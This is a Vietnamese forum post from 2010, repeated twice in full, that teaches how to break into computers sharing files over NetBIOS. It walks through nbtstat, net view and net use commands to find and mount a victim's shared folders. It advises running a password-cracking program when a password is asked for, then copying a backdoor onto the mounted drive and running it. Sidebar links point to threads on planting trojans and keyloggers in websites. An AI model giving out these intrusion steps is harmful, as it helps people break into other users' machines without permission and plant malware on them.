Search
Latest topics
Affiliates
Acess share file
Page 1 of 1
Acess share file
Admin Tue Dec 28, 2010 8:47 am
Share file thì không cần phải nói ai cũng biết nhưng khi người ta share file là một cơ hội tốt để đột nhập máy tính họ. Những chương trình đột nhập máy tính như backdoor thì tôi không phải giới thiệu các bạn đã biết . Tôi chỉ giới thiệu làm cách nào để chạy backdoor khi có share file .
Một số lệnh trong NetBios cũng rất hữu ích(các bạn tự tìm hiểu lấy) tôi chỉ nêu một số lệnh phục cho việc xem và access
Để lấy thông tin trên máy người share file thì
C:\> nbtstat -a <tên người share file>
-A <nhập IP>
Nó sẽ thông báo những thông tin về máy người này trên mạng
C:\> net view \<tên máy>
Nó sẽ hiển thị những thư mục mà người này share. Lệnh này chỉ có thể hiển thị những thư mục share không ẩn . Còn hiển thị tất cả các share ẩn thì dùng một số chương trình có ở những trang norton.com hay lockdown.com
Khi đã thấy share bạn dùng lệnh sau để tạo một ổ đĩa ảo trên máy mình
C:\> net use <tên ổ địa do mình muốn> : \\<IP>\<sharename>
Khi thực hiện được nó sẽ báo thành công ! Nếu như nó đòi pw khi truy nhập thì phải dùng chương trình dò pass ( bạn tìm trong phần download ).
Khi đã xâm nhập thành công , công việc còn lại chỉ là chép backdoor vào ổ đĩa ảo này và chạy backdoor
Để chạy được backdoor bạn phải chuyển sang ổ đĩa ảo mà bạn đã tạo và chép backdoor lên mà chạy.
-------------------------
Vài options về NBT Viết tắt của NetBIOS over TCP/IP
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
ví dụ cụ thể:
>nbtstat -A 192.168.0.2
connect local area :
Node IpAddress: [192.168.0.2] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
AT-M3 <00> UNIQUE Registered
ATM <00> GROUP Registered
AT-M3 <03> UNIQUE Registered
AT-M3 <20> UNIQUE Registered
ATM <1E> GROUP Registered
ATM <1D> UNIQUE Registered
...<01> GROUP Registered
MAC Address = 00-10-DC-1F-CF-FA
Ý nghĩ của các chứ số nằm <XX>
00: base computernames and workgroups, also in "*" queries
01: master browser, in magic cookie
03: messaging/alerter service; name of logged-in user
20: resource-sharing "server service" name
1B: domain master-browser name
1C: domain controller name
1E: domain/workgroup master browser election announcement [?]
Một số lệnh trong NetBios cũng rất hữu ích(các bạn tự tìm hiểu lấy) tôi chỉ nêu một số lệnh phục cho việc xem và access
Để lấy thông tin trên máy người share file thì
C:\> nbtstat -a <tên người share file>
-A <nhập IP>
Nó sẽ thông báo những thông tin về máy người này trên mạng
C:\> net view \<tên máy>
Nó sẽ hiển thị những thư mục mà người này share. Lệnh này chỉ có thể hiển thị những thư mục share không ẩn . Còn hiển thị tất cả các share ẩn thì dùng một số chương trình có ở những trang norton.com hay lockdown.com
Khi đã thấy share bạn dùng lệnh sau để tạo một ổ đĩa ảo trên máy mình
C:\> net use <tên ổ địa do mình muốn> : \\<IP>\<sharename>
Khi thực hiện được nó sẽ báo thành công ! Nếu như nó đòi pw khi truy nhập thì phải dùng chương trình dò pass ( bạn tìm trong phần download ).
Khi đã xâm nhập thành công , công việc còn lại chỉ là chép backdoor vào ổ đĩa ảo này và chạy backdoor
Để chạy được backdoor bạn phải chuyển sang ổ đĩa ảo mà bạn đã tạo và chép backdoor lên mà chạy.
-------------------------
Vài options về NBT Viết tắt của NetBIOS over TCP/IP
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its
IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP
addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP
addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
ví dụ cụ thể:
>nbtstat -A 192.168.0.2
connect local area :
Node IpAddress: [192.168.0.2] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
AT-M3 <00> UNIQUE Registered
ATM <00> GROUP Registered
AT-M3 <03> UNIQUE Registered
AT-M3 <20> UNIQUE Registered
ATM <1E> GROUP Registered
ATM <1D> UNIQUE Registered
...<01> GROUP Registered
MAC Address = 00-10-DC-1F-CF-FA
Ý nghĩ của các chứ số nằm <XX>
00: base computernames and workgroups, also in "*" queries
01: master browser, in magic cookie
03: messaging/alerter service; name of logged-in user
20: resource-sharing "server service" name
1B: domain master-browser name
1C: domain controller name
1E: domain/workgroup master browser election announcement [?]
Admin- Admin
- Tổng số bài gửi : 782
Join date : 2009-08-15 -
Similar topics» Share Code sao lưu, Phục Hồi CSDL Cực Cool chỉ 1 file duy nhất
» All File Locker 1.2 - Đặt Pass Cho Tất Cả Các File
» Dữ liệu ở ổ đĩa D của mình bây giờ các file chữ từ từ biến thành màu xanh dương gần hết, còn mấy file nữa chắc cũng sắp chuyển sang màu xanh hết, không biết là tại virút hay bị sao vậy các bạn?
» Share AutoIT source Perfectkeylog Key General
» Khôi phục các file bị mất
» All File Locker 1.2 - Đặt Pass Cho Tất Cả Các File
» Dữ liệu ở ổ đĩa D của mình bây giờ các file chữ từ từ biến thành màu xanh dương gần hết, còn mấy file nữa chắc cũng sắp chuyển sang màu xanh hết, không biết là tại virút hay bị sao vậy các bạn?
» Share AutoIT source Perfectkeylog Key General
» Khôi phục các file bị mất
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
» Tuyệt kỹ cua giai
» NETCAT.........
» Bảo mật CSDL bằng phương pháp mã hóa.
» Hàm mã hóa MD5 bằng JavaScript
» Giá của món quà
» Sẽ chỉ yêu ai?
» Cách đọc bảng chữ cái!
» Gắn trojan, keylog, virus vào website, forum